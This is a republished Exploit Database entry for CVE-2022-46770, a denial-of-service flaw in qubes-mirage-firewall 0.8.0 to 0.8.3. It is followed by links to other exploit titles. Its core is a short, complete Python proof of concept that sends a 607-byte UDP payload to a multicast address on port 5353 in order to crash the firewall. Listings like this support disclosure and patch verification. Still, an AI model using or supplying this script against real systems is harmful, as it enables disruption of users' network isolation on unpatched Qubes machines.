qubes-mirage-firewall v0.8.3 – Denial Of Service (DoS)

Exploit Database
19 阅读

作者： Krzysztof Burghardt

日期： 2023-03-31
类别：
- dos
平台：
- hardware
来源：https://www.exploit-db.com/exploits/51157/

# Exploit Title: qubes-mirage-firewallv0.8.3 - Denial Of Service (DoS)
# Date: 2022-12-04
# Exploit Author: Krzysztof Burghardt <krzysztof@burghardt.pl>
# Vendor Homepage: https://mirage.io/blog/MSA03
# Software Link: https://github.com/mirage/qubes-mirage-firewall/releases
# Version: >= 0.8.0 & < 0.8.4
# Tested on: Qubes OS
# CVE: CVE-2022-46770

#PoC exploit from https://github.com/mirage/qubes-mirage-firewall/issues/166

#!/usr/bin/env python3

from socket import socket, AF_INET, SOCK_DGRAM

TARGET = "239.255.255.250"

PORT = 5353

PAYLOAD = b'a' * 607

s = socket(AF_INET, SOCK_DGRAM)

s.sendto(PAYLOAD, (TARGET, PORT))

last Exploits
qubes-mirage-firewall v0.8.3 – Denial Of Service (DoS)的更多信息

Microsoft Internet Explorer 6.0/7.0 – Null Pointer crashes：
Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow：
Sun Java System Web Server 6.1/7.0 – WebDAV Format String：
Microsoft Windows 8.1/2012 R2 – SMBv3 Null Pointer Dereference Denial of Service：
NCSS 07.1.21 – Array Overflow with Write2：
RarmaRadio 2.72.3 – ‘Username’ Denial of Service (PoC)：
Foscam Video Management System 1.1.6.6 – ‘UID’ Denial of Service (PoC)：
QEMU Guest Agent 2.12.50 – Denial of Service：